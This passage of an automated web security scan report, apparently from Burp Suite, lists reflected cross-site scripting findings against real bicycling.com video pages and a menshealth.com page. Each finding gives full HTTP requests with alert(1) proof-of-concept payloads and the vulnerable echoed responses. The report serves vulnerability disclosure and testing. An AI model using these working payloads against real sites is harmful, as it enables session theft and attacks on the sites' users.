Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85815
Date: Thu, 10 Mar 2011 16:50:09 GMT
X-Varnish: 909018827
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
%3A55&footer_height=0&content_type=content_item&read_more=0";
var this_embed_url = 'http://' + window.location.hostname + '/embed/player/C5QKZB153SRSPSH2;'
var magnifyReferrer = decodeURIComponent('NaN77465';alert(1)//f52713f5f05');

var magnifyViewer = '//w-c/C5QKZB153SRSPSH2';
var registrationRequired = false;


           var playerRoot = '/embed/player/';
           var componentRoot = '/embed/player/templates/compact/components/';
           va
...[SNIP]...

2.37. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf17"><script>alert(1)</script>6f4cc8b73d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed8bf17"><script>alert(1)</script>6f4cc8b73d4/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=ffebad8e173024e8ec1573a901e31dc8; path=/; expires=Fri, 11-Mar-2011 16:41:01 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48395
Date: Thu, 10 Mar 2011 16:41:01 GMT
X-Varnish: 908938376
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed8bf17"><script>alert(1)</script>6f4cc8b73d4/player/container/298/275/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed8bf17">
...[SNIP]...

2.38. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82156"><script>alert(1)</script>597d18b9bdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player82156"><script>alert(1)</script>597d18b9bdb/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=0a36f3dd74372891ac4a354e31f035b9; path=/; expires=Fri, 11-Mar-2011 16:41:06 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48395
Date: Thu, 10 Mar 2011 16:41:06 GMT
X-Varnish: 908939174
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/player82156"><script>alert(1)</script>597d18b9bdb/container/298/275/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed/player82156">
...[SNIP]...

2.39. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8e90<img%20src%3da%20onerror%3dalert(1)>21366086941 was submitted in the REST URL parameter 4. This input was echoed as a8e90<img src=a onerror=alert(1)>21366086941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/298a8e90<img%20src%3da%20onerror%3dalert(1)>21366086941/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85733
Date: Thu, 10 Mar 2011 16:41:27 GMT
X-Varnish: 908941969
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 298a8e90<img src=a onerror=alert(1)>21366086941px; height: 275px; }
   #magnify_widget_loading_indicator { height: 66px; width: 298a8e90<img src=a onerror=alert(1)>
...[SNIP]...

2.40. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4cd7'%3bb2cc4d48b59 was submitted in the REST URL parameter 4. This input was echoed as a4cd7';b2cc4d48b59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/298a4cd7'%3bb2cc4d48b59/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85565
Date: Thu, 10 Mar 2011 16:41:20 GMT
X-Varnish: 908941111
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
mponents/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '275px';
           document.body.style.width = '298a4cd7';b2cc4d48b59px';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '298a4cd7';b2cc4d48b59';
           var height = '275';
           var playerWidth = 282;
           var pl
...[SNIP]...

2.41. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97722'%3b90a6bc74ebe was submitted in the REST URL parameter 5. This input was echoed as 97722';90a6bc74ebe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/298/27597722'%3b90a6bc74ebe/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85665
Date: Thu, 10 Mar 2011 16:41:39 GMT
X-Varnish: 908943914
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
ot = '/embed/player/templates/compact/components/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '27597722';90a6bc74ebepx';
           document.body.style.width = '298px';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '298';
           var height = '27597722';90a6bc74e
...[SNIP]...

2.42. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b8aeb<img%20src%3da%20onerror%3dalert(1)>474e73dc4fd was submitted in the REST URL parameter 5. This input was echoed as b8aeb<img src=a onerror=alert(1)>474e73dc4fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/298/275b8aeb<img%20src%3da%20onerror%3dalert(1)>474e73dc4fd/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85689
Date: Thu, 10 Mar 2011 16:41:45 GMT
X-Varnish: 908944847
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 298px; height: 275b8aeb<img src=a onerror=alert(1)>474e73dc4fdpx; }
   #magnify_widget_loading_indicator { height: 66px; width: 298px; position: absolute; top: 104.5px; text-align: center; }

           /* make sure that the add-this flash object that keeps showing up at t
...[SNIP]...

2.43. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d7b"><script>alert(1)</script>9abb6c75940 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/298/275/C5QKZB153SRSPSH2a5d7b"><script>alert(1)</script>9abb6c75940?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=6718ae9537f93a5668cd28d529e90e73; path=/; expires=Fri, 11-Mar-2011 16:41:49 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48395
Date: Thu, 10 Mar 2011 16:41:49 GMT
X-Varnish: 908945755
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2a5d7b"><script>alert(1)</script>9abb6c75940%0AServer: video.bicycling.com%0APath: /embed/player/container/298/275/C5QKZB153SRSPSH2a5d7b">
...[SNIP]...

2.44. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/298/275/C5QKZB153SRSPSH2

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f21bd'%3balert(1)//17703974801 was submitted in the referrer parameter. This input was echoed as f21bd';alert(1)//17703974801 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.htmlf21bd'%3balert(1)//17703974801 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85481
Date: Thu, 10 Mar 2011 16:40:44 GMT
X-Varnish: 908935604
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
+ window.location.hostname + '/embed/player/C5QKZB153SRSPSH2;'
var magnifyReferrer = decodeURIComponent('http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.htmlf21bd';alert(1)//17703974801');

var magnifyViewer = '//w-c/C5QKZB153SRSPSH2';
var registrationRequired = false;


           var playerRoot = '/embed/player/';
           var componentRoot = '/embed/player/templates/compact/components/';
           va
...[SNIP]...

2.45. http://video.bicycling.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582f9"><script>alert(1)</script>5f6610e2d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico582f9"><script>alert(1)</script>5f6610e2d0 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:50:06 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 47969
Date: Thu, 10 Mar 2011 16:50:06 GMT
X-Varnish: 909018290
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/favicon.ico582f9"><script>alert(1)</script>5f6610e2d0%0AServer: video.bicycling.com%0APath: /favicon.ico582f9">
...[SNIP]...

2.46. http://video.bicycling.com/services/usage_request [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /services/usage_request

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 111bf"><script>alert(1)</script>927d1636d01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services111bf"><script>alert(1)</script>927d1636d01/usage_request?content_type=player&assoc_type=C&assoc_cid=21CQ460F9BWWZSF9 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=32fd78e5b8e565d81a8b753a695c4932; path=/; expires=Fri, 11-Mar-2011 16:43:12 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48575
Date: Thu, 10 Mar 2011 16:43:13 GMT
X-Varnish: 908958246
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
his automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/services111bf"><script>alert(1)</script>927d1636d01/usage_request%0AServer: video.bicycling.com%0APath: /services111bf">
...[SNIP]...

2.47. http://video.bicycling.com/services/usage_request [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /services/usage_request

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a9f"><script>alert(1)</script>07c14eaacbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/usage_request92a9f"><script>alert(1)</script>07c14eaacbf?content_type=player&assoc_type=C&assoc_cid=21CQ460F9BWWZSF9 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=03364444f44b5f5745218908ae105253; path=/; expires=Fri, 11-Mar-2011 16:43:15 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48575
Date: Thu, 10 Mar 2011 16:43:15 GMT
X-Varnish: 908958605
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
lly generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/services/usage_request92a9f"><script>alert(1)</script>07c14eaacbf%0AServer: video.bicycling.com%0APath: /services/usage_request92a9f">
...[SNIP]...

2.48. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /cda/expertlandingpage.do

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bfdb'%3balert(1)//57bc71cf34c was submitted in the site parameter. This input was echoed as 4bfdb';alert(1)//57bc71cf34c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/expertlandingpage.do?site=MensHealth4bfdb'%3balert(1)//57bc71cf34c&cm_re=HP-_-Footer-_-Experts HTTP/1.1
Host: www.menshealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 16:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89802

<!DOCTYPE html>

